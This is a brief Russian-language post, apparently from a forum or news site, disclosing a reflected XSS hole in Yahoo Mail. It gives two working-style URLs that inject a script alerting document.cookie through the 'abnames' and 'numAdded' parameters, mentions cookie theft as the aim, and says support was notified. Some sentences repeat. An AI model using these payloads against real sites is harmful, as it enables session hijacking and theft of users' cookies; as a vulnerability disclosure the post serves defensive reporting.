XSS на yahoo.com
Уязвимость позволяет удаленному пользователю выполнить произвольный JS сценарий на компе жертвы и таким образом утащить cоokie например=).
[X] - id сервера,юзаемый пользователем.
На момент написания новости Xss работала,и повзоляла вставлять html и js формы.
Супорты предупреждены.
Уязвимость позволяет удаленному пользователю выполнить произвольный JS сценарий на компе жертвы и таким образом утащить cоokie например=).
Код:
http://f[X].mail.yahoo.com/ym/ShowFolder?rb=Inbox&abnames=
%3Cscript%3Ealert(document.cookie)%3C/script%3E&abids=0
http://f[X].mail.yahoo.com/ym/Welcome?order=down&sort=date&
numAdded=1%3Cscript%3Ealert(document.cookie)%3C/script%3EНа момент написания новости Xss работала,и повзоляла вставлять html и js формы.
Супорты предупреждены.